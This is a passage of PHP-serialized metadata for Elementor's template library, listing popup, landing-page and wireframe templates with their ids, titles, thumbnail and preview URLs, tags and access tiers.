Platform\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/03/login-design-platform-10.jpg\";s:12:\"tmpl_created\";i:1647340531;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:147:\"https://library.elementor.com/popups/classic-login-popup-login-design-platform/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:25:\"[\"Design\",\"Login\",\"SaaS\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:148;a:20:{s:4:\"tmpl\";i:1271;s:2:\"id\";i:22325;s:5:\"title\";s:36:\"Fly-In | Contact | Digital Marketing\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/digital-marketing-11.jpg\";s:12:\"tmpl_created\";i:1647340770;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:144:\"https://library.elementor.com/popups/fly-in-contact-popup-digital-marketing/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:51:\"[\"Business\",\"Contact\",\"Digital Agency\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:149;a:20:{s:4:\"tmpl\";i:1272;s:2:\"id\";i:22331;s:5:\"title\";s:36:\"Fly-In | CTA | Dog Cat Food Delivery\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/dog-cat-food-delivery-5.jpg\";s:12:\"tmpl_created\";i:1647341069;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:144:\"https://library.elementor.com/popups/fly-in-cta-popup-dog-cat-food-delivery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:33:\"[\"cta\",\"Delivery Service\",\"Pets\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:150;a:20:{s:4:\"tmpl\";i:1273;s:2:\"id\";i:22337;s:5:\"title\";s:37:\"Full Screen | Contact | Design Studio\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/design-studio-12.jpg\";s:12:\"tmpl_created\";i:1647341370;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/popups/full-screen-contact-popup-design-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:39:\"[\"Business\",\"Contact\",\"Digital Agency\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:151;a:20:{s:4:\"tmpl\";i:1274;s:2:\"id\";i:22343;s:5:\"title\";s:44:\"Classic | Contact | Support Product Platform\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2022/03/support-13.jpg\";s:12:\"tmpl_created\";i:1647341972;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/popups/classic-contact-support-product-platform/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:21:\"[\"Contact\",\"Support\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:152;a:20:{s:4:\"tmpl\";i:1275;s:2:\"id\";i:22371;s:5:\"title\";s:38:\"Full Screen | Contact | Small Business\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/small-business-14.jpg\";s:12:\"tmpl_created\";i:1647342508;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/full-screen-contact-small-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:40:\"[\"Business\",\"Contact\",\"Interior Design\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:153;a:20:{s:4:\"tmpl\";i:1276;s:2:\"id\";i:22377;s:5:\"title\";s:31:\"Classic | Contact | Online Shop\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/online-shop-15.jpg\";s:12:\"tmpl_created\";i:1647352786;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-contact-online-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:11:\"[\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:154;a:20:{s:4:\"tmpl\";i:1277;s:2:\"id\";i:22383;s:5:\"title\";s:40:\"Classic | Booking | Children Optometrist\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/children-optometrist-16.jpg\";s:12:\"tmpl_created\";i:1647352963;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/classic-booking-children-optometrist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:53:\"[\"Booking\",\"Business\",\"Contact\",\"Education\",\"Health\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:155;a:20:{s:4:\"tmpl\";i:1278;s:2:\"id\";i:22389;s:5:\"title\";s:28:\"Fly-In | Contact | Open Week\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2022/03/open-week17.jpg\";s:12:\"tmpl_created\";i:1647353281;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/fly-in-contact-open-week/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:34:\"[\"Business\",\"Contact\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:156;a:20:{s:4:\"tmpl\";i:1279;s:2:\"id\";i:22397;s:5:\"title\";s:43:\"Full Screen | CTA | Plant Pots Online Store\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/03/plant-pots-online-store-18.jpg\";s:12:\"tmpl_created\";i:1647353429;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/popups/full-screen-cta-plant-pots-online-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:33:\"[\"Ecommerce\",\"Marketing\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:157;a:20:{s:4:\"tmpl\";i:1054;s:2:\"id\";i:15414;s:5:\"title\";s:32:\"Classic | Contact | Dance Studio\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/10/PopUp.jpg\";s:12:\"tmpl_created\";i:1603180596;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-contact-dance-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:16:\"[\"Dance Studio\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:762;s:11:\"trend_index\";i:650;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:158;a:20:{s:4:\"tmpl\";i:1398;s:2:\"id\";i:23687;s:5:\"title\";s:32:\"Pizza Promotion &#8211; Business\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/04/48-Pizza-Promotion.jpg\";s:12:\"tmpl_created\";i:1649670575;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/pizza-promotion-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:92:\"[\"Business\",\"Cooking\",\"Delivery\",\"Discount\",\"Fast Food\",\"Food\",\"Landing Pages\",\"Restaurant\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:159;a:20:{s:4:\"tmpl\";i:1400;s:2:\"id\";i:23751;s:5:\"title\";s:33:\"Baby Sleep Webinar &#8211; Events\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/04/63-Baby-Sleep-Webinar.jpg\";s:12:\"tmpl_created\";i:1649676065;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/baby-sleep-webinar-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:227:\"[\"Baby\",\"Booking\",\"Business\",\"Children\",\"Course Online\",\"Education\",\"Events\",\"Health\",\"Landing Pages\",\"Life Coach\",\"Lifestyle\",\"Online Event\",\"Online Service\",\"Parenting\",\"Professional\",\"Remote\",\"Services\",\"Training\",\"Webinar\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:160;a:20:{s:4:\"tmpl\";i:1401;s:2:\"id\";i:23776;s:5:\"title\";s:34:\"Ski Hotel Promotion &#8211; Travel\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/04/64-Ski-Hotel-Promotion.jpg\";s:12:\"tmpl_created\";i:1649691720;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/ski-hotel-promotion-travel/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"Travel\";s:4:\"tags\";s:118:\"[\"Accommodation\",\"Booking\",\"Discount. Landing Pages\",\"Lifestyle\",\"Luxury\",\"Services\",\"Spa\",\"Travel\",\"Trip\",\"Vacation\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:161;a:20:{s:4:\"tmpl\";i:1402;s:2:\"id\";i:23804;s:5:\"title\";s:30:\"Cake Delivery &#8211; Business\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/04/67-Cake-Delivery.jpg\";s:12:\"tmpl_created\";i:1649692909;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/cake-delivery-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:101:\"[\"Bakery\",\"Business\",\"Cake\",\"Cooking\",\"Delivery\",\"Discount\",\"Food\",\"Landing Pages\",\"Products\",\"Shop\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:162;a:20:{s:4:\"tmpl\";i:1403;s:2:\"id\";i:23832;s:5:\"title\";s:32:\"Furniture Store &#8211; Business\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/04/87-Furniture-Store.jpg\";s:12:\"tmpl_created\";i:1649694812;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/furniture-store-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:232:\"[\"Architecture\",\"Art\",\"Business\",\"Construction\",\"Coupon\",\"Creative\",\"Decor\",\"Designer\",\"Discount\",\"Fashion\",\"Furniture Design\",\"Home\",\"House\",\"Interior Design\",\"Landing Pages\",\"Lifestyle\",\"Products\",\"Professional\",\"Services\",\"Shop\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:163;a:20:{s:4:\"tmpl\";i:1404;s:2:\"id\";i:23746;s:5:\"title\";s:22:\"Nails &#8211; Business\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2022/04/62-Nails-1.jpg\";s:12:\"tmpl_created\";i:1649704635;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/lp/nails-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:173:\"[\"Art\",\"Beauty\",\"Business\",\"Colorful\",\"Cosmetics\",\"Creative\",\"Design\",\"Discount\",\"Fashion\",\"Girly\",\"Landing Pages\",\"Lifestyle\",\"Manicure\",\"Modern\",\"Professional\",\"Services\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:164;a:20:{s:4:\"tmpl\";i:1405;s:2:\"id\";i:23846;s:5:\"title\";s:29:\"Music Festival &#8211; Events\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/04/88-Music-Festival.jpg\";s:12:\"tmpl_created\";i:1649707763;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/lp/music-festival-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:128:\"[\"Author\",\"Booking\",\"Business\",\"Creative\",\"Discount\",\"Events\",\"Landing Pages\",\"Music\",\"Online\",\"Online Event\",\"Party\",\"Virtual\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:165;a:20:{s:4:\"tmpl\";i:1406;s:2:\"id\";i:23872;s:5:\"title\";s:40:\"Fashion Styling Course &#8211; Education\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/04/89-Fashion-Styling-Course.jpg\";s:12:\"tmpl_created\";i:1649708569;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/fashion-styling-course-education/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Education\";s:4:\"tags\";s:173:\"[\"Aesthetic\",\"Art\",\"Beauty\",\"Business\",\"Course Online\",\"Creative\",\"Discount\",\"Education\",\"Fashion\",\"Landing Pages\",\"Lifestyle\",\"Online\",\"Online Service\",\"Stylist\",\"Virtual\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:166;a:20:{s:4:\"tmpl\";i:1407;s:2:\"id\";i:23897;s:5:\"title\";s:33:\"Bags Online Shop &#8211; Business\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/04/90-Bags-Online-Shop.jpg\";s:12:\"tmpl_created\";i:1649709513;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/bags-online-shop-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:170:\"[\"Art\",\"Bag\",\"Business\",\"Creative\",\"Design\",\"Discount\",\"Fashion\",\"Landing Pages\",\"Lifestyle\",\"Luxury\",\"Modern\",\"Online\",\"Online Shop\",\"Products\",\"Sales\",\"Shop\",\"Stylist\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:167;a:20:{s:4:\"tmpl\";i:1408;s:2:\"id\";i:23932;s:5:\"title\";s:32:\"Cooking Academy &#8211; Business\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/04/91-Cooking-Academy.jpg\";s:12:\"tmpl_created\";i:1649710216;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/cooking-academy-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:145:\"[\"Academy\",\"Booking\",\"Business\",\"Chef\",\"Cooking\",\"Education\",\"Food\",\"Free Trial\",\"Landing Pages\",\"Professional\",\"School\",\"Teacher\",\"Testimonial\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:168;a:20:{s:4:\"tmpl\";i:1409;s:2:\"id\";i:23970;s:5:\"title\";s:45:\"Ophthalmology Medical Clinic &#8211; Business\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/04/92-Ophthalmology-Medical-Clinic.jpg\";s:12:\"tmpl_created\";i:1649711096;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/lp/ophthalmology-medical-clinic-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:165:\"[\"About\",\"Business\",\"Care\",\"Consulting\",\"Eye\",\"Free Trial\",\"Glasses\",\"Health\",\"Landing Pages\",\"Lifestyle\",\"Medical\",\"Modern\",\"Optometrist\",\"Professional\",\"Services\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:169;a:20:{s:4:\"tmpl\";i:1425;s:2:\"id\";i:24331;s:5:\"title\";s:24:\"Wireframe &#8211; Home 1\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Home-1.jpg\";s:12:\"tmpl_created\";i:1653988363;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/wireframe-home-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:102:\"[\"Business\",\"Contact\",\"Features\",\"Footer\",\"Header\",\"Homepage\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:170;a:20:{s:4:\"tmpl\";i:1218;s:2:\"id\";i:20792;s:5:\"title\";s:26:\"Luxury Car &#8211; Product\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/11/250x280-1.jpg\";s:12:\"tmpl_created\";i:1636903770;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/lp/luxury-car-product/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"Product\";s:4:\"tags\";s:54:\"[\"car\",\"Ecommerce\",\"Landing Pages\",\"Luxury\",\"Product\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:171;a:20:{s:4:\"tmpl\";i:1428;s:2:\"id\";i:24398;s:5:\"title\";s:25:\"Wireframe &#8211; About 1\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-About-1.jpg\";s:12:\"tmpl_created\";i:1653988534;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/wireframe-about-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:83:\"[\"About\",\"Business\",\"Contact\",\"Features\",\"Footer\",\"Professional\",\"Services\",\"Team\"]\";s:10:\"menu_order\";i:2;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:172;a:20:{s:4:\"tmpl\";i:991;s:2:\"id\";i:13413;s:5:\"title\";s:33:\"Classic | Contact | Online Course\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/04/PopUp-Help.jpg\";s:12:\"tmpl_created\";i:1587474761;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/classic-contact-online-course/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:2;s:16:\"popularity_index\";i:530;s:11:\"trend_index\";i:369;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:173;a:20:{s:4:\"tmpl\";i:1053;s:2:\"id\";i:15272;s:5:\"title\";s:32:\"Classic | Contact | 